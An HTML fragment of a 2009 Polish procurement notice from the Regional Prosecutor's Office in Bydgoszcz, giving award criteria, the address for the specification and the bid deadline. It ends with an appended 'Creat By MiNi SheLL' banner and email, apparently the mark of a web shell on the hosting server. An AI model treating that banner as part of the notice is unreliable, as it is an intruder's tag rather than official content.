<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 85</li>
<li>2 - Doświadczenie Wykonawcy - 15</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bydgoszcz.po.gov.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Prokuratura Okręgowa w Bydgoszczy 
ul. Farna 6 
85-101 Bydgoszcz 
Wydział III Budżetowo - Administracyjny, pokój 303..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.02.2009 godzina 11:00, miejsce: Prokuratura Okręgowa w Bydgoszczy 
ul. Farna 6 
85-101 Bydgoszcz 
Wydział III Budżetowo - Administracyjny, pokój 303..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com